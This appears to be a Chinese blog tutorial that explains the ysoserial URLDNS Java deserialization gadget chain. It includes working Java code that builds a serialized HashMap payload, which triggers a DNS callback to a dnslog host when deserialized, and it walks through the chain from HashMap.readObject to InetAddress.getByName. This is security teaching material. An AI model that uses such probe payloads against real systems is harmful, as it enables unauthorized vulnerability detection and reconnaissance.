反序列化之路-URLDNS

最新推荐文章于 2025-07-30 06:40:16 发布
原创 最新推荐文章于 2025-07-30 06:40:16 发布 · 1k 阅读 · 16 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#代码审计 #反序列化

前言

URLDNS 是ysoserial中一个利用链的名字,但准确来说,这个其实不能称作“利用链”。因为其参数不是一个可以“利用”的命令,而是一个URL,其能触发的结果也不是命令执行,而是一次DNS请求。但是因为其使用Java内置的类构造,对第三方库没有依赖,并且gadget也简单,适合成为我们初学者刚开始学习反序列化利用链的一个很好的开始

1.URLDNS构造

构造代码

import java.net.MalformedURLException;  
import java.net.URL;  
import java.util.HashMap;  
  
public class URLDNS_Test {  
    public static void main(String[] args) throws MalformedURLException {  
        HashMap<URL,Integer> map = new HashMap<URL,Integer>();  

        URL url = new URL("http://afe2aed36f.ipv6.1433.eu.org.");  
        map.put(url,1);  
    }  
}

我们运行之后发现dnslog收到了一个请求

在这里插入图片描述

1.1 HashMap的put方法触发请求分析

在最后map.put()方法前打下断点,跟着调试走

在这里插入图片描述

进入到HashMap.java的put方法中(如果调试点击步入直接过去的,可以使用shift+F7智能步入)

在这里插入图片描述

里面的putval方法是往HashMap中放入键值对的方法,在放之前对key计算了hash,继续跟到hash方法中

传入的key是一个url对象,不同对象的hash计算方法是在各自的类中实现的,这里key.hashCode()调用URL类中的hashCode方法:java.net.URL#hashCode

我们进入到URL.Java文件中跟踪到hashCode方法,这个方法的目的是计算并返回对象的哈希码

然后hashcode计算,判断如果不是-1,则直接返回,表示已经算过了,是-1则继续计算

在这里插入图片描述

所以if语句里的条件不成立,继续走到handler.hashCode,这里的handler是URLStreamHandler的一个实例

在这里插入图片描述

继续跟进,发现会调用getHostAddress()方法

在这里插入图片描述

在这里插入图片描述

这⾥ InetAddress.getByName(host) 的作⽤是根据主机名,获取其 IP 地址,在⽹络上其实就是⼀次 DNS 查询。

2.URLDNS链分析

2.1 前提

我们先明确产生漏洞的攻击路线:

前提:继承Serializable

入口类:source (重写 readObject 调用常见的函数;参数类型宽泛,比如可以传入一个类作为参数)

找到入口类之后要找调用链 gadget chain 相同名称、相同类型

执行类 sink (RCE SSRF 写文件等等)比如 exec 这种函数

2.2 分析

首先,攻击前提,那必然是要继承了 Serializable 这个接口

HashMap 确实继承了 Serializable 这个接口。

在这里插入图片描述

发现有入口readobject()

我们看到第 1416 行与 1418 行中,Key 与 Value 的值执行了 readObject 的操作,再将 Key 和 Value 两个变量扔进 hash 这个方法里

image.png
若传入的参数 key 不为空,则 h = key.hashCode(),hashCode()是一个object,满足我们 调用常见的函数 这一条件

在这里插入图片描述

2.3 攻击分析

tip:如果在测试过程中发现dnslog没有接受到请求,换一个进行尝试

我们自己生成一个payload

public class URLDNS_Test2 {  
    public static void serialize(Object obj) throws IOException{  
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.ser"));  
        oos.writeObject(obj);  
    }  
  
    public static void main(String[] args) throws Exception{  
        HashMap<URL,Integer> hashmap= new HashMap<URL,Integer>();  
        URL url = new URL("http://bfe70140f8.ipv6.1433.eu.org.");  
        Class c = url.getClass();  
        Field hashcodefile = c.getDeclaredField("hashCode");  
        hashcodefile.setAccessible(true);  
        hashcodefile.set(url,1234);  
        hashmap.put(url,1);  
        hashcodefile.set(url,-1);  
        serialize(hashmap);  
    }  
}

我们先设置hashcodefile.set(url,1234);

上面分析过,hashcode默认为-1,会自动执行下面的操作进行一次url访问,所以我们先设置一个非-1值,然后put()添加进去之后,再重新设置为-1,为反序列化的网络访问打下基础

在这里插入图片描述

然后我们执行反序列化上面的ser.ser文件,就会触发一次dns访问

public class URLDNS_Test1 {  
    public static void main(String[] args) throws IOException, ClassNotFoundException {  
        unserialize("ser.ser");  
    }  
  
    public static void unserialize(String Filename) throws IOException, ClassCastException, ClassNotFoundException {  
        ObjectInputStream objectInputStream =new ObjectInputStream(new FileInputStream(Filename));  
        Object obj = objectInputStream.readObject();  
    }  
}

2.4 ysoserial的payload分析

我们先去到 ysoserial 的项目当中,去看看它是如何构造 URLDNS 链的。

ysoserial/URLDNS.java at master · frohoff/ysoserial (github.com)

打开ysoserial/payloads/URLDNS.java的源码,可以看到它的调用链

*   Gadget Chain:  
*     HashMap.readObject()  
*       HashMap.putVal()  
*         HashMap.hash()  
*           URL.hashCode()

在这里插入图片描述

在这里插入图片描述

我们查看ysoserial的urldns的payload生成代码,和咱们上面的攻击代码相差不大

第一点是禁止序列化时进行请求,1.2.3中咱们是通过设置hashCode非-1,而ysoserial是通过重写空的getHostAddress方法来实现

第二点是在put方法之后需要把hashCode设置为-1,然后在反序列化中触发访问请求

ysoserial的payload生成:
在这里插入图片描述

3.利用链挖掘角度分析URLDNS链

如上的分析都是我们以一个漏洞分析者去正向的分析这条链子,那么以漏洞挖掘者的身份我们就要倒过来看这条链了,首先我们从getByName这个函数开始,这个函数可以触发dns请求,那么我们看看谁调用了这个函数,我么可以点击这个函数,然后用Ctrl+Alt+H来查看这个函数的调用关系

在这里插入图片描述

然后就是逐步去看这些函数,是否能构造反序列化链,构造需要我们要注意三个事情

1、参数可控
2、类可反序列化,继承了序列化接口
3、最终走到反序列化触发的readObject

所以整个链路线为:

  • InetAddress.getByName(String) (java.net)

    • Url.getHostAddress() (java.net)

      • Url.hashcode() (java.net)

        • HashMap.hash(Object) (java.net)

          • HashMap.readObject()

在这里插入图片描述

在这里插入图片描述

4.参考文章

https://www.cnblogs.com/nice0e3/p/13772184.html#0x00-前言

https://drun1baby.top/2022/05/17/Java反序列化基础篇-01-反序列化概念与利用/

https://developer.aliyun.com/article/1215712#slide-2

java安全——ysoserial工具URLDNS链分析
网络安全
09-08 2226
本篇我们将学习ysoserial工具的URLDNS链,相对于前面学习的CC链来说,URLDNS链就比较简单了。 URLDNS是ysoserial工具用于检测是否存在Java反序列化漏洞的一个利用链,通过URLDNS利用链可以发起一次DNS查询请求,从而可以验证目标站点是否存在反序列化漏洞,并且该利用链任何不需要第三方依赖,也没有JDK版本的限制。 但是URLDNS利用链也只能用于发起DNS查询请求,也不能做其他事情,因此URLDNS链更多的是用于POC检测。 有了前面的基础,这里直接上URLD
JAVA反序列化深入学习(二):URLDNS
Neolock的博客
03-23 871
URLDNS 是适合新手分析的反序列化链,只依赖原生类,没有 jdk 版本限制,也被 ysoserial 涵盖在其中。它不会执行命令,只会触发 DNS 解析,因此通常用来探测是否存在反序列化漏洞。
java反序列化URLDNS链学习
dayouzi的博客
04-25 1447
1、Java 序列化是指把 Java 对象转换为字节序列的过程。ObjectOutputStream类的 writeObject() 方法可以实现序列化。2、Java 反序列化是指把字节序列恢复为 Java 对象的过程。ObjectInputStream 类的 readObject() 方法用于反序列化
URLDNS链分析
enhengzZ的博客
01-26 2215
ysoserial ysoserial 在idea构建好项目,添加依赖真是麻了,在其pom.xml上有几个依赖位置已经改变,需要手动导入jar包。。 项目准备好后,在pom.xml找到入口类 报错了,这是因为没有传入参数,我们分析URLDNS,在编辑配置里添加程序实参 URLDNS “http://r5z2ag.ceye.io” 可见执行成功 至此能获得序列化数据 URLDNS URLDNS是ysoserial序列化中比较简单的一个链,URLDNS的利用效果是只能触发一次dns请求,而不能去执行命
Java反序列化URLDNS
m0_62466350的博客
05-28 1070
URLDNS链是java原生态的一条利用链,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
URLDNS反序列化
最新发布
qq_56695124的博客
07-30 1012
URLDNS外带反序列化
JAVA反序列化URLDNS链分析
2301_79323180的博客
04-28 2097
URLDNS是ysoserial中利用链的一个名字,通常用于检测是否存在Java反序列化漏洞。
URLDNS反序列化
m0_62484818的博客
10-31 1112
漏洞背景URLDNS反序列化漏洞源于Java的DNS解析机制和反序列化功能。当Java应用在反序列化过程中处理特定的对象时,可能会触发DNS查询,攻击者可以利用这一特性进行攻击。漏洞原理该漏洞的核心在于Java的URL类在反序列化时,会自动调用DNS解析来获取域名的IP地址。如果攻击者能够控制反序列化过程中的数据,就可以构造一个特殊的URL对象,使得Java应用在反序列化时向指定的DNS服务器发送请求。
URLDNS链构造
zj2084的博客
04-20 714
我们进行调试的时候第一步就是调用putVal这个函数,然后进一步调用hash这个函数,hash函数接着调用hashCode这个函数,hashCode然后再调用具体的url值,然后调用getHostAddress这个函数,最终调用到getByName,接着就做域名解析。我们继续向下调试,就会进入到URL里面的hashCode,这个hashCode是啥,就是URL这个对象的一个属性,同时在URL对象hashCode这个属性是私有的,且默认值是-1。也就是说,我们这个链条的目的是什么?
Java代码审计13之URLDNS
划水的小白白
08-22 1032
1、简介urldns链 2、hashmap与url类的分析 2.1、Hashmap类readObject方法的跟进 2.2、URL类hashcode方法的跟进 2.3、InetAddress类的getByName方法 3、整个链路的分析 3.1、整理上述的思路 3.2、一些疑问的测试 3.3、hashmap的put方法分析 3.4、反射 3.5、整个代码 4、补充说明
Java反序列化(二)——URLDNS链、CC1链
Xzy03210321的博客
08-13 1872
MapEntry这一种类来说,当Map遍历Entry(一个键值对)时,其底层就会将Map封装进MapEntry中,所以只需要遍历TransformedMap的Entry,并在遍历的过程中调用setValue,就能进入TransformedMap.checkSetValue(Object)中。而在遍历时,利用的是第一个参数Map,所以需要put个键值对进去,这样在遍历是才会非空,进入循环的逻辑里。
JavaSec 基础之 URLDNS
akdelt的博客
03-08 1152
然后设置 hashCode 为 1234,这样put时 hashcode 不是默认的 -1 就不会走后面的逻辑而是直接返回 1234,所以 put 之后不会产生 dns 解析,然后我们设置 hashCode 为 -1,接着序列化 U,所以反序列化进入 hashCode 时 hashCode 为 -1,产生 dns 解析。也会触发 URL 的 hashcode 方法,第一次因为 hashcode 默认 -1 ,所以可以触发下面的方法,但是返回值赋给了 u 这个对象的 hashcode 再序列化 u。
ysoserial之URLDNS
weixin_40151476的博客
03-04 1094
URLDNS的利用链如下,这里直接引用p牛的,p牛牛p。
java URLDNS
Litsasuk的博客
05-07 1186
详细分析java反序列化中的URLDNS利用链
JAVA原生反序列化漏洞之URLDNS(超详细!!!)
2301_76794844的博客
05-30 1009
JAVA原生反序列化漏洞之URLDNS(超详细!!!)
java反序列化链学习——URLDNS
ubaichu的博客
02-24 994
java反序列化链——URLDNS
JAVA反序列化链之URLDNS
weixin_68408599的博客
12-16 1039
跟进URL类中的hashCode()方法,这个hashCode()的值在调用put方法之后,我们将其又重新定义为了"-1"从而确保是反序列化来触发的请求。运行后查看DnsLog平台,发现触发了请求,也就是说,我们直接进行这样构造,不进行反序列化操作,就能触发DnsLog请求。值是私有的,因此无法直接进行更改,因此将其进行反射,将其修改为除"-1"意外的其他值。没错,在第二段中的put函数,和这个一样。,它定义了一个K类型的key变量,然后对反序列化的输入流进行反序列化,并把反序列化出的键赋值给key变量。
【Java安全】ysoserial-URLDNS链分析
网络安全从业者的学习笔记
02-06 2185
Java安全中经常会提到反序列化,一个将Java对象转换为字节序列传输(或保存)并在接收字节序列后反序列化为Java对象的机制,在传输(或保存)的过程中,恶意攻击者能够将传输的字节序列替换为恶意代码进而触发反序列化漏洞。其中最经典的反序列化漏洞利用工具——ysoserial,下面就分析学习一下ysoserial中的URLDNS链,以便更好地理解反序列化漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值